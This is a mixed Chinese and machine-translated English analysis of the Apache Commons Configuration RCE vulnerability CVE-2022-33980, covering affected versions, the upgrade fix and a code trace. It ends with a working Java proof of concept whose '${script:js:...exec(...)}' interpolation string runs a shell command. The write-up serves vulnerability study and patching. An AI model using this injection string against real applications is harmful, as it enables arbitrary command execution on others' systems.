Apache Commons Configuration Remote Code Execution Vulnerability (CVE-2022-33980) Analysis & Reproduction

一、什么是Apache Commons Configuration

Apache Commons Configuration是ApacheAn open source project component under the foundation.它是一个java应用程序的配置管理工具,Provides a general management method,可以从properties或者xmlThe configuration information of the software loaded in the file,It is used to build the basic environment that supports software operation.让JavaDevelopers can use a unified interface to read different types of configuration files.

二、Apache Commons Configuration远程代码执行漏洞

漏洞状态

漏洞描述

近日,Apache官方发布了关于Apache Commons Configuration远程代码执行漏洞（CVE-2022-33980）的安全公告.据公告描述,该漏洞是由于Apache Commons Configuration提供的ConfigurationThe variable explanation function is flawed,An attacker can exploit this vulnerability under certain circumstances,Construct malicious data to execute remote code.

Apache Commons ConfigurationPerform variable interpolation（Variable Interpolation）Allows dynamic evaluation and extension of properties.插值的标准格式是"${prefix:name}",其中"prefix"用于定位执行插值的org.apache.commons.configuration2.interpol.Lookup实例.

从2.4版到2.7版,默认的Lookup实例集包括可能导致任意代码执行或与远程服务器联系的插值器.As mentioned in the announcement"script"可使用JVM脚本执行引擎（javax.script）执行表达式,If an untrusted configuration value is used,Applications that use interpolated defaults in the affected version are at high risk of being affected by remote code execution.

• “script” - execute expressions using the JVM script execution engine (javax.script)
• “dns” - resolve dns records
• “url” - load values from urls, including from remote servers

漏洞等级

高

目前漏洞POC已被泄露,An attacker exploiting this vulnerability could lead to remote command execution,endanger system security.

影响范围

2.4 <= Apache Commons Configuration <= 2.7

修复建议

官方已发布漏洞补丁及修复版本,酌情升级至安全版本,下载链接如下：https://commons.apache.org/proper/commons-configuration/changes-report.html

三、漏洞分析

The picture above shows the bugPOC,使用java.lang.Runtime.getRuntime()的exec()method for arbitrary command execution.Other execution engines are as follows

${script:js:java.lang.Runtime.getRuntime().exec("ping -c1 10.10.10.10")}
${sys:os.version}
${env:PATH}

Enter after the object is createdinterpolate()The method performs interpolation of the incoming value.If the change passed in is a string,This method checks if it contains variables.

进入resolveSingleVariable(final String strValue)方法,Inserts the string value of a single variable.

随后进入extractVariableName(final String strValue)提取变量名.

进入resolve(final String var)解析后,可以看到变量var = "script:js:java.lang.Runtime.getRuntime().exec("ping -c1 10.10.10.10")",PREFIX_SEPARATOR = :,Split analysis of variables.

After getting the valueprefix = "script"随即进入fetchLookupForPrefix(prefix).lookup(name)Get the executor object.

through the obtained object,进入public String lookup(final String key)方法,其中key的值为"js:java.lang.Runtime.getRuntime().exec("ping -c1 10.10.10.10")"

至此,我们看到scriptEngine.eval(script)进行命令执行,At this point the thread that executes the command is createdPID=26152的执行进程.

The program then returns upwards,See the message that the execution is completevalue = "Process[pid=26152, exitValue=1]".

You can see it by capturing packets,成功的执行了ping -c1 10.10.10.10命令.

四、漏洞利用

Applications using this version of the component theoretically have the vulnerability,It's just the ease of passing in the parameters that determines how the vulnerability can be exploited.

本地POC链接见附录.

package main;

import org.apache.commons.configuration2.interpol.ConfigurationInterpolator;
import org.apache.commons.configuration2.interpol.InterpolatorSpecification;

public class main {
    public static void  main(String []args) throws Exception{
        String cmd = new String();
        cmd = "${script:js:java.lang.Runtime.getRuntime().exec(\"ping -c1 10.10.10.10\")}";
        // cmd = "${sys:user.home}";
        // cmd = "${sys:os.version}";
        // cmd = "${env:PATH}";
        InterpolatorSpecification spec = new InterpolatorSpecification.Builder()
                .withPrefixLookups(ConfigurationInterpolator.getDefaultPrefixLookups())
                .withDefaultLookups(ConfigurationInterpolator.getDefaultPrefixLookups().values())
                .create();

        ConfigurationInterpolator interpolator = ConfigurationInterpolator.fromSpecification(spec);
        System.out.printf("POC: %s",interpolator.interpolate(cmd));
    }
}

使用maven构建项目

<!-- https://mvnrepository.com/artifact/org.apache.commons/commons-configuration2 -->
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-configuration2</artifactId>
    <version>2.5</version>
</dependency>

五、附录

参考链接：
https://lists.apache.org/thread/tdf5n7j80lfxdhs2764vn0xmpfodm87s
https://commons.apache.org/proper/commons-configuration/userguide/howto_basicfeatures.html#Variable_Interpolation
https://commons.apache.org/proper/commons-configuration/changes-report.html
https://github.com/tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE